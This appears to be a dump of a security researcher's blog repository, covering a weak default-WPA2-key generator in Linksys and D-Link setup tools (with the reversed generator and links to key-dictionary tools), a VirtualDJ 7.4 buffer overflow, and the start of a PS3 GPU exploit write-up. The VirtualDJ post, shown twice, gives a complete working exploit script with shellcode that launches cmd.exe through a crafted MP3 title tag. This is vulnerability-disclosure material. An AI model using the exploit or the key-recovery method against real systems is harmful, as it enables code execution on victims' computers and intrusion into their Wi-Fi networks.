 73 |             <p>After finding the <a href="../2013-03-08-wpa2-vulnerability-tplink/">TP-Link WPA2 Key Generation Vulnerability</a>, I reverse-engineered assistants provided by other vendors. It turns out that some Linksys and D-Link routers user nearly identical algorithms to generate the default WPA2 keys as TP-Link routers use. For more information about this vulnerability and its consequences, please refer to the report linked above as redundant information will be omitted here.</p>
 74 | <p>This time, the vulnerability affects the <strong>Linksys EasyLink Advisor</strong> and <strong>D-Link Quick Setup Wizard</strong> assistants, both based in <em>Network Magic</em>, a software created by Pure Networks, a company belonging to Cisco/Linksys. Since Pure Networks actually sold their software to third parties, e.g. D-Link, there might be a chance of other affected assistants.</p>
 75 | <p>The reversed generator is:</p>
 76 | <div class="codehilite"><pre><span></span><span class="n">blacklist_windows</span> <span class="o">=</span> <span class="s2">&quot;1I2Z0O5SUV&quot;</span>
 77 | <span class="n">blacklist_macosx</span>  <span class="o">=</span> <span class="s2">&quot;B8DO0I1S5UVZ2&quot;</span>
 78 | <span class="n">blacklist</span> <span class="o">=</span> <span class="n">blacklist_windows</span>  <span class="c1"># Change me</span>
 79 | 
 80 | <span class="k">def</span> <span class="nf">gen</span><span class="p">(</span><span class="n">seed</span><span class="p">):</span>
 81 |     <span class="n">key</span> <span class="o">=</span> <span class="s2">&quot;&quot;</span>
 82 |     <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">10</span><span class="p">):</span>
 83 |         <span class="k">while</span> <span class="bp">True</span><span class="p">:</span>
 84 |             <span class="n">seed</span> <span class="o">=</span> <span class="p">((</span><span class="n">seed</span> <span class="o">*</span> <span class="mh">0x343FD</span><span class="p">)</span> <span class="o">+</span> <span class="mh">0x269EC3</span><span class="p">)</span> <span class="o">%</span> <span class="p">(</span><span class="mi">2</span><span class="o">**</span><span class="mi">32</span><span class="p">)</span>
 85 |             <span class="n">edx</span> <span class="o">=</span> <span class="p">((</span><span class="n">seed</span> <span class="o">&gt;&gt;</span> <span class="mh">0x10</span><span class="p">)</span> <span class="o">&amp;</span> <span class="mh">0x7FFF</span><span class="p">)</span> <span class="o">%</span> <span class="mh">0x24</span>
 86 |             <span class="k">if</span> <span class="n">edx</span> <span class="o">&gt;=</span> <span class="mh">0xA</span><span class="p">:</span>
 87 |                 <span class="n">edx</span> <span class="o">+=</span> <span class="mh">0x37</span>
 88 |             <span class="k">else</span><span class="p">:</span>
 89 |                 <span class="n">edx</span> <span class="o">+=</span> <span class="mh">0x30</span>
 90 |             <span class="k">if</span> <span class="nb">chr</span><span class="p">(</span><span class="n">edx</span><span class="p">)</span> <span class="ow">not</span> <span class="ow">in</span> <span class="n">blacklist</span><span class="p">:</span>
 91 |                 <span class="n">key</span> <span class="o">+=</span> <span class="nb">chr</span><span class="p">(</span><span class="n">edx</span><span class="p">)</span>
 92 |                 <span class="k">break</span>
 93 |     <span class="k">return</span> <span class="n">key</span>
 94 | </pre></div>
 95 | 
 96 | 
 97 | <p>The seeds used by this function are obtained in the exactly same way as in the TP-Link assistant. The only difference this time is that rather than pseudorandomly choosing characters from a <em>whitelist</em>, it adds random characters in range <code>[0-9A-Z]</code>, filtering out those found in a hardcoded <em>blacklist</em>, meant to prevent adding visually similar characters such as '<code>0</code>' and '<code>O</code>' to the key.</p>
 98 | <p>As explained in the TP-Link vulnerability report, the low entropy can be exploited to bruteforce the key in a matter of minutes with a powerful GPU or hours with a CPU.</p>
 99 | <h2 id="affected-routers">Affected routers</h2>
100 | <p>The complete list of affected Linksys routers is:</p>
101 | <ul>
102 | <li>WAP610N (Blacklisted characters on Windows assistant: <code>"1I2Z0O5SUVB8"</code>)</li>
103 | <li>WRT110</li>
104 | <li>WRT120N</li>
105 | <li>WRT160N (V1, V2, V3)</li>
106 | <li>WRT160N-HP (V1*)</li>
107 | <li>WRT160NL</li>
108 | <li>WRT310N (V1, V2)</li>
109 | <li>WRT320N</li>
110 | <li>WRT400N</li>
111 | <li>WRT54G2</li>
112 | <li>WRT610N (V1*, V2)</li>
113 | </ul>
114 | <p>The complete list of affected D-Link routers is:</p>
115 | <ul>
116 | <li>DGL-4100</li>
117 | <li>DGL-4300</li>
118 | <li>DIR-615 (not all revisions)</li>
119 | <li>DIR-625</li>
120 | <li>DIR-635</li>
121 | <li>WBR-1310</li>
122 | <li>WBR-1310 Rev. B</li>
123 | <li>WBR-2310</li>
124 | </ul>
125 | <h2 id="resources">Resources</h2>
126 | <ul>
127 | <li><strong>Linksys-CheckKeys</strong>: Check if your key is vulnarable to this attack, i.e., find whether your key is in the set of keys generated by all possible seeds. Download: <a href="http://www.mediafire.com/download.php?pmqt9aykwxhwkto">http://www.mediafire.com/download.php?pmqt9aykwxhwkto</a>.</li>
128 | <li><strong>Linksys-GenSeeds</strong>: This tool calculates the seed interval from the given time interval in which the router might have been installed. Download: <a href="http://www.mediafire.com/download.php?kpe7844kqd9bk4j">http://www.mediafire.com/download.php?kpe7844kqd9bk4j</a>.</li>
129 | <li><strong>Linksys-GenKeys</strong>: Generate a key dictionary by specifying a seed interval. Download: <a href="http://www.mediafire.com/download.php?2h9y0pkay9id1rt">http://www.mediafire.com/download.php?2h9y0pkay9id1rt</a>.</li>
130 | </ul>
131 | <h2 id="solutions">Solutions</h2>
132 | <ul>
133 | <li>Do not use seeds at all. Feed the results of a cryptographically secure PRNG such as <code>/dev/urandom</code> in Unix-like sytems as indices of the character array modulo its length. This is for instance what the Linksys E4200 WLAN routers do, the indices of the key character array are provided by <code>CryptGenRandom</code> in <code>Advapi32.dll</code>.</li>
134 | <li>If for some reason you want to use seeds for generating keys:</li>
135 | <li>Make them bigger than 32-bit. Just 2^32 keys are easy to check.</li>
136 | <li>Obtain them from a cryptographically secure PRNG.</li>
137 | <li>If you still want to obtain them from the system time, use low granularity time intervals (e.g. elapsed time in nanoseconds rather than seconds) to minimize the number of bits an attacker can guess. </li>
138 | </ul>
139 |         </article>
140 |         <hr>
141 |         <footer>
142 |             <p>
143 |                 Questions? Comments? <a href="https://github.com/AlexAltea/blog/issues">Open an issue!</a>
144 |             </p>
145 |             <p><a href="mailto:alexandro@phi.nz">alexandro@phi.nz</a></p>
146 |         </footer>
147 |     </body>
148 | </html>
149 | 


--------------------------------------------------------------------------------
/posts/2013-04-20-virtualdj-74-buffer-overflow/_main.md:
--------------------------------------------------------------------------------
 1 | ---
 2 | layout: post
 3 | date: 2013-04-20
 4 | title: VirtualDJ Pro/Home 7.4: Buffer Overflow
 5 | author: Alexandro Sanchez
 6 | ---
 7 | 
 8 | I have found a buffer overflow vulnerability in [VirtualDJ Pro 7.4 and VirtualDJ Home 7.4](http://www.virtualdj.com/) and possibly previous versions of this software. After right-clicking a file and entering the "_File Infos_" > "_Cover..._" menu, VirtualDJ tries to find a cover for the given file on Google Images and stores the request URL in a buffer which looks like: `"http://images.google.com/images?q=X"` where `X` corresponds to the ID3 tag _Title_. Special characters of this tag are ignored, and any sequence of symbols (e.g. `' '`, `'-'`, `'_'`) is replaced with `'+'`. The problem is [once again](../2013-03-30-virtualdj-73-buffer-overflow/) that VirtualDJ does not check if the information stored in the ID3 tags is too big to fit in the buffer.
 9 | 
10 | To exploit this vulnerability, I searched for a `call esp` instruction stored in an address that could be represented with alphanumeric characters, I found such instruction in 0x444D4C64, that is, `"dLMD"`. After entering this call, all the bytes after the _Fake Title_ + _Spaces_ + _Padding_ + `"dLMD"` will be executed. Since we can only use alphanumeric characters, we have to encode the shellcode and decode it in execution time using only bytes in range `[0-9A-Za-z]`. For this purpose I used a function from [ALPHA3](http://code.google.com/p/alpha3/). After that, the original shellcode will be decoded and executed.
11 | 
12 | ```python
13 | #Exploit: VirtualDJ Pro/Home <=7.4 Buffer Overflow Vulnerability 
14 | #By: Alexandro Sanchez Bach | functionmixer.blogspot.com 
15 | #More info: http://www.youtube.com/watch?v=Yini294AR2Q 
16 | 
17 | def encodeData(decoder, data, validValues):
18 |     assert data.find("\0") == -1, "Shellcode must be NULL free"
19 |     data += "\0" #End of shellcode 
20 |     encData = decoder[-2:]
21 |     decoder = decoder[:-2]
22 |     for p in range(len(data)):
23 |         dByte = ord(data[p])
24 |         pxByte = ord(encData[p+1])
25 |         bx, by = encoder(dByte ^ pxByte, validValues)
26 |         encData += chr(bx) + chr(by)
27 |     return decoder + encData
28 |  
29 | def encoder(value, validValues): 
30 |       for bx in validValues:
31 |         imul = (bx * 0x30) &amp; 0xFF
32 |         for by in validValues:
33 |             if imul ^ by == value: return [bx, by]
34 |  
35 | 
36 | #Shellcode (e.g. run cmd.exe) 
37 | shellcode  = "\xB8\xFF\xEF\xFF\xFF\xF7\xD0\x2B\xE0\x55\x8B\xEC"
38 | shellcode += "\x33\xFF\x57\x83\xEC\x04\xC6\x45\xF8\x63\xC6\x45"
39 | shellcode += "\xF9\x6D\xC6\x45\xFA\x64\xC6\x45\xFB\x2E\xC6\x45"
40 | shellcode += "\xFC\x65\xC6\x45\xFD\x78\xC6\x45\xFE\x65\x8D\x45"
41 | shellcode += "\xF8\x50\xBB\xC7\x93\xBF\x77\xFF\xD3"
42 | retAddress = "\xED\x1E\x94\x7C" # jmp ESP ntdll.dll WinXP SP2 
43 | shellcode += retAddress
44 | 
45 | #Arguments 
46 | fakeTitle  = "Greatest Hits of the Internet - Nyan Cat"
47 | while fakeTitle[0]  == " ": fakeTitle = fakeTitle[1:]
48 | while fakeTitle[-1] == " ": fakeTitle = fakeTitle[:-1]
49 | for i in fakeTitle:
50 |     if i not in "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz -":
51 |         raise "Invalid characters in the fake title"
52 | fakeTitle2 = fakeTitle.replace("-"," ")
53 | while " " in fakeTitle2: fakeTitle2 = fakeTitle2.replace(" "," ")
54 | 
55 | #Exploit 
56 | exploit =  fakeTitle + " "*1024 + "1"*(1026 - len(fakeTitle2)-1)
57 | exploit += "dLMD" #RETN address 
58 | exploit += "XXAI" #ESP := Baseaddr of encoded payload 
59 | exploit += encodeData(
60 | 	"TYhffffk4diFkDql02Dqm0D1CuEE", #Baseaddr of encoded payload := ESP 
61 |     shellcode,
62 |     map(ord, list("0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"))
63 | )
64 | 
65 | print exploit
66 | #Paste the generated code in the tag 'Title' of the MP3 file.
67 | ```
68 | 
69 | You can see a demo of this proof of concept at: https://www.youtube.com/watch?v=Yini294AR2Q.
70 | 
71 | ## Log
72 | 
73 | * __2013-04-07__: Bug discovered. VirtualDJ was emailed about this a few days later.
74 | * __2013-04-20__: Bug ignored. Exploit published.
75 | 


--------------------------------------------------------------------------------
/posts/2013-04-20-virtualdj-74-buffer-overflow/index.html:
--------------------------------------------------------------------------------
  1 | <!-- This file has been auto-generated! -->
  2 | <!DOCTYPE html>
  3 | <html>
  4 |     <head>
  5 |         <meta charset="utf-8">
  6 |         <meta name="viewport" content="width=device-width, initial-scale=1">
  7 |         <title>VirtualDJ Pro/Home 7.4: Buffer Overflow</title>
  8 |         <!-- Style -->
  9 |         <link rel="stylesheet" href="../../css/code.css">
 10 |         <link rel="stylesheet" href="../../css/markdown.css">
 11 |         <style>
 12 |             body {
 13 |                 box-sizing: border-box;
 14 |                 min-width: 200px;
 15 |                 max-width: 980px;
 16 |                 margin: 0 auto;
 17 |                 padding: 45px;
 18 |             }
 19 | 
 20 |             header {
 21 |                 position: relative;
 22 |             }
 23 |             header > .links {
 24 |                 position: absolute;
 25 |                 right: 0;
 26 |             }
 27 | 
 28 |             .post-key {
 29 |                 background-color: hsl(45, 67%, 80%);
 30 |                 border-radius: 5px 0px 0px 5px;
 31 |                 padding: 2px 6px 2px 8px;
 32 |                 margin: 0px;
 33 |             }
 34 |             .post-val {
 35 |                 background-color: hsl(45, 67%, 90%);
 36 |                 border-radius: 0px 5px 5px 0px;
 37 |                 padding: 2px 8px 2px 6px;
 38 |                 margin: 0px;
 39 |             }
 40 | 
 41 |             footer {
 42 |                 text-align: center;
 43 |             }
 44 |         
 45 |             @media (max-width: 767px) {
 46 |                 body {
 47 |                     padding: 15px;
 48 |                 }
 49 |             }
 50 |         </style>
 51 |     </head>
 52 |     <body class="markdown-body">
 53 |         <header>
 54 |             <div class="links">
 55 |                 <span>
 56 |                     <a href="https://twitter.com/AlexAltea">Twitter</a> |
 57 |                     <a href="https://github.com/AlexAltea">Github</a> |
 58 |                     <a href="mailto:alexandro@phi.nz">Email</a>
 59 |                 </span>
 60 |             </div>
 61 |             <span><a href="../../">&lt; Other articles</a></span>
 62 |         </header>
 63 |         <article>
 64 |             <h1>VirtualDJ Pro/Home 7.4: Buffer Overflow</h1>
 65 |             <p>
 66 |                 <span 
 67 |                     class="post-key">Author</span><span
 68 |                     class="post-val">Alexandro Sanchez</span>
 69 |                 <span
 70 |                     class="post-key">Date</span><span
 71 |                     class="post-val">2013-04-20</span>
 72 |             </p>
 73 |             <p>I have found a buffer overflow vulnerability in <a href="http://www.virtualdj.com/">VirtualDJ Pro 7.4 and VirtualDJ Home 7.4</a> and possibly previous versions of this software. After right-clicking a file and entering the "<em>File Infos</em>" &gt; "<em>Cover...</em>" menu, VirtualDJ tries to find a cover for the given file on Google Images and stores the request URL in a buffer which looks like: <code>"http://images.google.com/images?q=X"</code> where <code>X</code> corresponds to the ID3 tag <em>Title</em>. Special characters of this tag are ignored, and any sequence of symbols (e.g. <code>' '</code>, <code>'-'</code>, <code>'_'</code>) is replaced with <code>'+'</code>. The problem is <a href="../2013-03-30-virtualdj-73-buffer-overflow/">once again</a> that VirtualDJ does not check if the information stored in the ID3 tags is too big to fit in the buffer.</p>
 74 | <p>To exploit this vulnerability, I searched for a <code>call esp</code> instruction stored in an address that could be represented with alphanumeric characters, I found such instruction in 0x444D4C64, that is, <code>"dLMD"</code>. After entering this call, all the bytes after the <em>Fake Title</em> + <em>Spaces</em> + <em>Padding</em> + <code>"dLMD"</code> will be executed. Since we can only use alphanumeric characters, we have to encode the shellcode and decode it in execution time using only bytes in range <code>[0-9A-Za-z]</code>. For this purpose I used a function from <a href="http://code.google.com/p/alpha3/">ALPHA3</a>. After that, the original shellcode will be decoded and executed.</p>
 75 | <div class="codehilite"><pre><span></span><span class="c1">#Exploit: VirtualDJ Pro/Home &lt;=7.4 Buffer Overflow Vulnerability </span>
 76 | <span class="c1">#By: Alexandro Sanchez Bach | functionmixer.blogspot.com </span>
 77 | <span class="c1">#More info: http://www.youtube.com/watch?v=Yini294AR2Q </span>
 78 | 
 79 | <span class="k">def</span> <span class="nf">encodeData</span><span class="p">(</span><span class="n">decoder</span><span class="p">,</span> <span class="n">data</span><span class="p">,</span> <span class="n">validValues</span><span class="p">):</span>
 80 |     <span class="k">assert</span> <span class="n">data</span><span class="o">.</span><span class="n">find</span><span class="p">(</span><span class="s2">&quot;</span><span class="se">\0</span><span class="s2">&quot;</span><span class="p">)</span> <span class="o">==</span> <span class="o">-</span><span class="mi">1</span><span class="p">,</span> <span class="s2">&quot;Shellcode must be NULL free&quot;</span>
 81 |     <span class="n">data</span> <span class="o">+=</span> <span class="s2">&quot;</span><span class="se">\0</span><span class="s2">&quot;</span> <span class="c1">#End of shellcode </span>
 82 |     <span class="n">encData</span> <span class="o">=</span> <span class="n">decoder</span><span class="p">[</span><span class="o">-</span><span class="mi">2</span><span class="p">:]</span>
 83 |     <span class="n">decoder</span> <span class="o">=</span> <span class="n">decoder</span><span class="p">[:</span><span class="o">-</span><span class="mi">2</span><span class="p">]</span>
 84 |     <span class="k">for</span> <span class="n">p</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="nb">len</span><span class="p">(</span><span class="n">data</span><span class="p">)):</span>
 85 |         <span class="n">dByte</span> <span class="o">=</span> <span class="nb">ord</span><span class="p">(</span><span class="n">data</span><span class="p">[</span><span class="n">p</span><span class="p">])</span>
 86 |         <span class="n">pxByte</span> <span class="o">=</span> <span class="nb">ord</span><span class="p">(</span><span class="n">encData</span><span class="p">[</span><span class="n">p</span><span class="o">+</span><span class="mi">1</span><span class="p">])</span>
 87 |         <span class="n">bx</span><span class="p">,</span> <span class="n">by</span> <span class="o">=</span> <span class="n">encoder</span><span class="p">(</span><span class="n">dByte</span> <span class="o">^</span> <span class="n">pxByte</span><span class="p">,</span> <span class="n">validValues</span><span class="p">)</span>
 88 |         <span class="n">encData</span> <span class="o">+=</span> <span class="nb">chr</span><span class="p">(</span><span class="n">bx</span><span class="p">)</span> <span class="o">+</span> <span class="nb">chr</span><span class="p">(</span><span class="n">by</span><span class="p">)</span>
 89 |     <span class="k">return</span> <span class="n">decoder</span> <span class="o">+</span> <span class="n">encData</span>
 90 | 
 91 | <span class="k">def</span> <span class="nf">encoder</span><span class="p">(</span><span class="n">value</span><span class="p">,</span> <span class="n">validValues</span><span class="p">):</span> 
 92 |       <span class="k">for</span> <span class="n">bx</span> <span class="ow">in</span> <span class="n">validValues</span><span class="p">:</span>
 93 |         <span class="n">imul</span> <span class="o">=</span> <span class="p">(</span><span class="n">bx</span> <span class="o">*</span> <span class="mh">0x30</span><span class="p">)</span> <span class="o">&amp;</span><span class="n">amp</span><span class="p">;</span> <span class="mh">0xFF</span>
 94 |         <span class="k">for</span> <span class="n">by</span> <span class="ow">in</span> <span class="n">validValues</span><span class="p">:</span>
 95 |             <span class="k">if</span> <span class="n">imul</span> <span class="o">^</span> <span class="n">by</span> <span class="o">==</span> <span class="n">value</span><span class="p">:</span> <span class="k">return</span> <span class="p">[</span><span class="n">bx</span><span class="p">,</span> <span class="n">by</span><span class="p">]</span>
 96 | 
 97 | 
 98 | <span class="c1">#Shellcode (e.g. run cmd.exe) </span>
 99 | <span class="n">shellcode</span>  <span class="o">=</span> <span class="s2">&quot;</span><span class="se">\xB8\xFF\xEF\xFF\xFF\xF7\xD0\x2B\xE0\x55\x8B\xEC</span><span class="s2">&quot;</span>
100 | <span class="n">shellcode</span> <span class="o">+=</span> <span class="s2">&quot;</span><span class="se">\x33\xFF\x57\x83\xEC\x04\xC6\x45\xF8\x63\xC6\x45</span><span class="s2">&quot;</span>
101 | <span class="n">shellcode</span> <span class="o">+=</span> <span class="s2">&quot;</span><span class="se">\xF9\x6D\xC6\x45\xFA\x64\xC6\x45\xFB\x2E\xC6\x45</span><span class="s2">&quot;</span>
102 | <span class="n">shellcode</span> <span class="o">+=</span> <span class="s2">&quot;</span><span class="se">\xFC\x65\xC6\x45\xFD\x78\xC6\x45\xFE\x65\x8D\x45</span><span class="s2">&quot;</span>
103 | <span class="n">shellcode</span> <span class="o">+=</span> <span class="s2">&quot;</span><span class="se">\xF8\x50\xBB\xC7\x93\xBF\x77\xFF\xD3</span><span class="s2">&quot;</span>
104 | <span class="n">retAddress</span> <span class="o">=</span> <span class="s2">&quot;</span><span class="se">\xED\x1E\x94\x7C</span><span class="s2">&quot;</span> <span class="c1"># jmp ESP ntdll.dll WinXP SP2 </span>
105 | <span class="n">shellcode</span> <span class="o">+=</span> <span class="n">retAddress</span>
106 | 
107 | <span class="c1">#Arguments </span>
108 | <span class="n">fakeTitle</span>  <span class="o">=</span> <span class="s2">&quot;Greatest Hits of the Internet - Nyan Cat&quot;</span>
109 | <span class="k">while</span> <span class="n">fakeTitle</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span>  <span class="o">==</span> <span class="s2">&quot; &quot;</span><span class="p">:</span> <span class="n">fakeTitle</span> <span class="o">=</span> <span class="n">fakeTitle</span><span class="p">[</span><span class="mi">1</span><span class="p">:]</span>
110 | <span class="k">while</span> <span class="n">fakeTitle</span><span class="p">[</span><span class="o">-</span><span class="mi">1</span><span class="p">]</span> <span class="o">==</span> <span class="s2">&quot; &quot;</span><span class="p">:</span> <span class="n">fakeTitle</span> <span class="o">=</span> <span class="n">fakeTitle</span><span class="p">[:</span><span class="o">-</span><span class="mi">1</span><span class="p">]</span>
111 | <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="n">fakeTitle</span><span class="p">:</span>
112 |     <span class="k">if</span> <span class="n">i</span> <span class="ow">not</span> <span class="ow">in</span> <span class="s2">&quot;0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz -&quot;</span><span class="p">:</span>
113 |         <span class="k">raise</span> <span class="s2">&quot;Invalid characters in the fake title&quot;</span>
114 | <span class="n">fakeTitle2</span> <span class="o">=</span> <span class="n">fakeTitle</span><span class="o">.</span><span class="n">replace</span><span class="p">(</span><span class="s2">&quot;-&quot;</span><span class="p">,</span><span class="s2">&quot; &quot;</span><span class="p">)</span>
115 | <span class="k">while</span> <span class="s2">&quot; &quot;</span> <span class="ow">in</span> <span class="n">fakeTitle2</span><span class="p">:</span> <span class="n">fakeTitle2</span> <span class="o">=</span> <span class="n">fakeTitle2</span><span class="o">.</span><span class="n">replace</span><span class="p">(</span><span class="s2">&quot; &quot;</span><span class="p">,</span><span class="s2">&quot; &quot;</span><span class="p">)</span>
116 | 
117 | <span class="c1">#Exploit </span>
118 | <span class="n">exploit</span> <span class="o">=</span>  <span class="n">fakeTitle</span> <span class="o">+</span> <span class="s2">&quot; &quot;</span><span class="o">*</span><span class="mi">1024</span> <span class="o">+</span> <span class="s2">&quot;1&quot;</span><span class="o">*</span><span class="p">(</span><span class="mi">1026</span> <span class="o">-</span> <span class="nb">len</span><span class="p">(</span><span class="n">fakeTitle2</span><span class="p">)</span><span class="o">-</span><span class="mi">1</span><span class="p">)</span>
119 | <span class="n">exploit</span> <span class="o">+=</span> <span class="s2">&quot;dLMD&quot;</span> <span class="c1">#RETN address </span>
120 | <span class="n">exploit</span> <span class="o">+=</span> <span class="s2">&quot;XXAI&quot;</span> <span class="c1">#ESP := Baseaddr of encoded payload </span>
121 | <span class="n">exploit</span> <span class="o">+=</span> <span class="n">encodeData</span><span class="p">(</span>
122 |     <span class="s2">&quot;TYhffffk4diFkDql02Dqm0D1CuEE&quot;</span><span class="p">,</span> <span class="c1">#Baseaddr of encoded payload := ESP </span>
123 |     <span class="n">shellcode</span><span class="p">,</span>
124 |     <span class="nb">map</span><span class="p">(</span><span class="nb">ord</span><span class="p">,</span> <span class="nb">list</span><span class="p">(</span><span class="s2">&quot;0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz&quot;</span><span class="p">))</span>
125 | <span class="p">)</span>
126 | 
127 | <span class="k">print</span> <span class="n">exploit</span>
128 | <span class="c1">#Paste the generated code in the tag &#39;Title&#39; of the MP3 file.</span>
129 | </pre></div>
130 | 
131 | 
132 | <p>You can see a demo of this proof of concept at: https://www.youtube.com/watch?v=Yini294AR2Q.</p>
133 | <h2 id="log">Log</h2>
134 | <ul>
135 | <li><strong>2013-04-07</strong>: Bug discovered. VirtualDJ was emailed about this a few days later.</li>
136 | <li><strong>2013-04-20</strong>: Bug ignored. Exploit published.</li>
137 | </ul>
138 |         </article>
139 |         <hr>
140 |         <footer>
141 |             <p>
142 |                 Questions? Comments? <a href="https://github.com/AlexAltea/blog/issues">Open an issue!</a>
143 |             </p>
144 |             <p><a href="mailto:alexandro@phi.nz">alexandro@phi.nz</a></p>
145 |         </footer>
146 |     </body>
147 | </html>
148 | 


--------------------------------------------------------------------------------
/posts/2016-03-16-ps3-gpu-exploit/_main.md:
--------------------------------------------------------------------------------
  1 | ---
  2 | layout: post
  3 | date: 2016-03-16
  4 | title: PS3 GPU Full VRAM/IO access exploit
  5 | author: Alexandro Sanchez
  6 | ---
  7 | 
  8 | ## Introduction
  9 | 
 10 | During the early development of the PlayStation 3 emulator project [Nucleus](https://github.com/AlexAltea/nucleus), it was decided to do a high-level emulation of the PlayStation 3 kernel known as CellOS Lv-2, often shortened to *LV2*. This implied reverse engineering and reimplementing the kernel, and intercept the syscalls used by the user-mode applications. The correct reimplementation of a certain group of syscalls, the kernel-level RSX driver interface with prefix `sys_rsx`, was crucial to the success of the GPU emulation. Additionally, these syscalls are a thin wrapper of the actual hypervisor-level RSX driver, accessible through the `lv1_gpu` syscalls.
 11 | 
 12 | Between February 2016 and March 2016, the developer *@3141card* reverse engineered the RSX driver code found in both layers. These sources, combined with the documentation and headers from the [Envytools](https://github.com/envytools/envytools)/[Nouveau](https://nouveau.freedesktop.org) projects and advice from *@mwk* eased the security analysis, resulting in the vulnerability presented here.
 13 | 
 14 | ## Reality Synthesizer
 15 |  
 16 | The Reality Synthesizer, commonly shortened to RSX, is the PlayStation 3 GPU and is composed of multiple engines. Gross over-simplifications take place throughout this section for the sake of readability. RSX exposes 3 Base Address Registers (BARs):
 17 | 
 18 | | BAR    | Offset          | Size    | Description |
 19 | |--------|-----------------|---------|-------------|
 20 | | *BAR0* | `0x28000000000` | 32 MB   | MMIO        |
 21 | | *BAR1* | `0x28080000000` | 256 MB  | VRAM        |
 22 | | *BAR2* | `0x28002000000` | *???*   | RAMIN       |
 23 | 
 24 | While *BAR0* points to the MMIO register area, both *BAR1* and *BAR2* map to the same 256 MB DDR memory. The difference is that BAR2 offsets are reversed, starting from the end of the VRAM and going to the beginning in chunks of 512 KB. Following formulas can be used to convert a BAR1 offset into a BAR2 offset and vice-versa:
 25 | 
 26 | ```cpp
 27 | uint32_t addr_vram_to_pramin(uint32_t offset) {
 28 |     uint32_t vram_size = 0x10000000; // 256 MB
 29 |     uint32_t rev_size = 0x80000; // 512 KB
 30 |     return (offset - vram_size) ^ -rev_size;
 31 | }
 32 | 
 33 | uint32_t addr_ramin_to_vram(uint32_t offset) {
 34 |     uint32_t vram_size = 0x10000000; // 256 MB
 35 |     uint32_t rev_size = 0x80000; // 512 KB
 36 |     return vram_size - (offset - (offset % rev_size)) - rev_size + (offset % rev_size);
 37 | }
 38 | ```
 39 | 
 40 | The driver fills RAMIN with objects which can be either *Engine objects* or *DMA objects*, commonly known as *FIFO objects*. The first kind describe engines that do a particular task (e.g. 2D graphics, 3D graphics, memory copying, etc.) the latter describe a DMA-accessible location.
 41 | 
 42 | Certain methods require a DMA object in order to know which data to access. Rather than directly passing the RAMIN offset to the engine, the driver populates hash-table known as *RAMHT*  which maps a unique handler to the RAMIN offset where the target DMA object is located.
 43 | 
 44 | The DMA objects contain information about the access type, the range size and starting offset. Taking into account the IO segments mapped by LV1, a DMA object can reference the following offsets:
 45 | 
 46 | | Offset                      | Description       |
 47 | |-----------------------------|-------------------|
 48 | | `0x00000000` - `0x0FFFFFFF` | VRAM              |
 49 | | `0x80000000` - `0x8FFFFFFF` | IOMMU (Context 0) |
 50 | | `0x90000000` - `0x9FFFFFFF` | IOMMU (Context 1) |
 51 | 
 52 | ## Exploit
 53 | 
 54 | ### RSX MMIO register mapping
 55 |  
 56 | The LV2 kernel provides the following syscall:
 57 |  
 58 | ```cpp
 59 | // LV2 SysCall 675 (0x2A3)
 60 | uint64_t sys_rsx_device_map(uint64_t mmio_addr, uint64_t vram_addr, uint64_t device_id);
 61 | ```
 62 |  
 63 | The table below lists the RSX devices that can be mapped through this syscall. The highlighted entries correspond to the devices involved in the vulnerability:
 64 |  
 65 | | Device |   MMIO         |   VRAM           |   Description   | Control |
 66 | |--------|----------------|------------------|-----------------|---------|
 67 | |    5   |   `0x08A000`   |   `----------`   |                 |   No    |
 68 | |    6   |   `0x200000`   |   `----------`   |   PMEDIA        |   No    |
 69 | |    7   |   `0x600000`   |   `----------`   |   PCRTC         |   No    |
 70 | |    8   |   `--------`   |   `0x0FF10000`   |                 |   No    |
 71 | |    9   |   `0x400000`   |   `----------`   |   PGRAPH        |   Yes   |
 72 | |   10   |   `0x100000`   |   `----------`   |   PFB           |   Yes   |
 73 | |   11   |   `0x00A000`   |   `----------`   |   PCOUNTER      |   Yes   |
 74 | |   12   |   `0x680000`   |   `----------`   |                 |   Yes   |
 75 | |   13   |   `0x090000`   |   `----------`   |                 |   Yes   |
 76 | | __14__ | __`0x002000`__ | __`----------`__ | __PFIFO__       | __Yes__ |
 77 | |   15   |   `0x088000`   |   `----------`   |   IOIF          |   Yes   |
 78 |  
 79 | By mapping the device 14, we can access the PFIFO MMIO registers from the userland code (or LV2 if `ss.param.fself.control` prevents from doing that and the EEPROM cannot be patched). Among the many PFIFO registers listed in the Nouveau headers and documents, some of them struck as particularly dangerous if misused. These registers are described below:
 80 | 
 81 | * `0x002140` *NV03_PFIFO_INTR_EN_0*: Disable the interrupts that trigger LV1 panics.
 82 | * `0x002210` *NV03_PFIFO_RAMHT*: Controls the size and RAMIN offset of RAMHT.
 83 | * `0x002218` *NV03_PFIFO_RAMRO*: Controls the size and RAMIN offset of RAMRO.
 84 | * `0x002504` *NV04_PFIFO_MODE*: Alternate between PIO and DMA mode in channels.
 85 | 
 86 | These register fields are described in detail here in [nv1_pfifo.xml](https://github.com/envytools/envytools/blob/master/rnndb/fifo/nv1_pfifo.xml). CellOS-LV1 sets RAMHT at RAMIN offset `0x10000` and a 16 KB uin size and RAMRO at RAMIN offset `0x18000` with 512 bytes in size.
 87 | 
 88 | ### RAMHT manipulation attempt
 89 | 
 90 | Our best chance to create custom DMA objects is to create a RAMHT entry pointing to an accessible VRAM area. The first attempt to do so would be moving RAMHT to reinterpret other byte sequences as valid entries. By the information before, RAMHT can only be relocated in the range *0x0* to *0x1F000* and have an alignment of 4 KB. In order to get a valid RAMHT entry poiting to our VRAM area, we need to find 8 byte sequence satisfying:
 91 | 
 92 | 1. Reinterpreting the bits 31:23 (MSB:LSB) of the second word is equal to 1 (i.e. our application's PFIFO channel).  
 93 | 2. Reinterpreting the bits 19:0 (MSB:LSB) of the second word is a value in range `[0x20000-0xFFFFF]` (mappable VRAM).
 94 | 3. Calculating the RAMHT offset minus the entry offset results in a multiple of 4 KB.
 95 | 
 96 | These conditions are hard to satisfy and aside from unlikely random values that might have been written during memtest, they will not be found in this range.
 97 | 
